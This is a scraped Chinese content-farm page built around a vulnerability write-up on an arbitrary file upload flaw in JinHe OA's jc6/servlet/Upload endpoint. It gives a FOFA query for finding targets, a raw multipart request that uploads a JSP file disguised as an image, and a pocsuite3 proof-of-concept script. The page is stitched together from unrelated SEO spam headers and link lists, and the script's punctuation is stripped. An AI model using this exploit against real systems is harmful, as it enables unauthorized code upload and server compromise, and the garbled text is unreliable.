当前位置: 首页 > news >正文

青岛网站运营推广wordpress 慢集市

青岛网站运营推广,wordpress 慢集市,滦平县建设局网站,石家庄建设网站公司哪家好免责声明 文章中涉及的漏洞均已修复#xff0c;敏感信息均已做打码处理#xff0c;文章仅做经验分享用途#xff0c;切勿当真#xff0c;未授权的攻击属于非法行为#xff01;文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的…免责声明 文章中涉及的漏洞均已修复敏感信息均已做打码处理文章仅做经验分享用途切勿当真未授权的攻击属于非法行为文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失均由使用者本人负责作者不为此承担任何责任一旦造成后果请自行负责 漏洞描述 金和OA jc6/servlet/Upload接口存在任意文件上传漏洞。 fofa语句 app金和网络-金和OA||body/jc6/platform/sys/login poc加检测 POST /jc6/servlet/Upload?officeSaveFlag0dbimgfalsepathsetpath/upload/ HTTP/1.1 Host: Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Content-Type: multipart/form-data; boundaryee055230808ca4602e92d0b7c4ecc63d--ee055230808ca4602e92d0b7c4ecc63d Content-Disposition: form-data; nameimg; filename1.jsp Content-Type: image/jpeg% out.println(tteesstt1); % --ee055230808ca4602e92d0b7c4ecc63d-- 上传成功后拼接返回的路径url/jc6/路径 poc脚本 脚本使用pocsuite框架 # _*_ coding:utf-8 _*_ # Time : 2024/1/16 # Author: 炼金术师诸葛亮 import re from pocsuite3.api import Output, POCBase, register_poc, requests, logger from pocsuite3.api import get_listener_ip, get_listener_port from pocsuite3.api import REVERSE_PAYLOAD, random_strclass jinhe_jc6_upload(POCBase):pocDesc 金和OA jc6/servlet/Upload接口任意文件上传漏洞author 炼金术师诸葛亮createDate 2024-1-16name 金和OA jc6/servlet/Upload接口任意文件上传漏洞def _verify(self):result {}url self.url /jc6/servlet/Upload?officeSaveFlag0dbimgfalsepathsetpath/upload/check_path self.url /test.aspxheaders {User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1),Accept: */*,Accept-Encoding: gzip, deflate,Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2,Connection: close,Content-Type: multipart/form-data; boundaryee055230808ca4602e92d0b7c4ecc63d}try:data --ee055230808ca4602e92d0b7c4ecc63d\r\nContent-Disposition: form-data; nameimg; filename1.jsp\r\nContent-Type: image/jpeg\r\n\r\n% out.println(tteesstt1); %\r\n--ee055230808ca4602e92d0b7c4ecc63d--response requests.post(url, headersheaders, datadata)if response.status_code 200 and upload in response.text:rtextresponse.textpath re.search(rarr\[2](.*?), rtext)if path:check_path self.url /jc6/ path.group(1)check_response requests.get(check_path)if check_response.status_code 200 and tteesstt1 in check_response.text:result[VerifyInfo] {}return self.parse_output(result)except Exception as e:passregister_poc(jinhe_jc6_upload) 脚本利用
http://www.pierceye.com/news/219443/

相关文章:

  • 成都专业网站制作关于论文网站开发参考文献
  • 免费做代理郑州seo招聘
  • 做网站系统更新后wordpress
  • 兰州网站建站2024免费网站推广
  • 深圳模板建站企业网站出现搜索
  • app开发网站模板该网站正在紧急升级维护中
  • 公众号编辑器365保定seo推广
  • 陕西整站关键词自然排名优化外贸获客渠道有哪些
  • 网站策划需要具备什么福州高端建站
  • 域名注册没有网站美食网页设计素材图片
  • wordpress网站在哪里修改密码ps做网站要求高吗
  • 企业网站带商城源码Audiology wordpress
  • 星月教你做网站东营城乡建设局官网
  • 镇江网站建设开发旺店通erp系统
  • 体育直播网站建设深圳制作小程序
  • 手机微信管理系统搜索引擎优化的流程是什么
  • 壁纸公司网站源码做网站价格表
  • 潜江网站设计商务科技网站建设
  • 合肥企业网站制作网站开发公司简介
  • 德州市建设小学网站文员工作内容
  • 网站域名买卖营销技巧第三季在线观看
  • 西宁市公司网站建设比较网站建设
  • 深圳网站设计公司建设部人才网站
  • 广水住房和城乡建设部网站巅峰网站建设
  • 建设智能家居网站SWOT分析商业网站有哪些
  • 相亲网站男人拉我做外汇h5特效网站欣赏
  • 网站一个多少钱有什么做同城的网站
  • 网站 改版 方案wordpress谷歌字体 4.9
  • 全网引流推广 价格网站百度关键词seo排名优化
  • 信用门户网站建设规范win7 iis 发布asp.net网站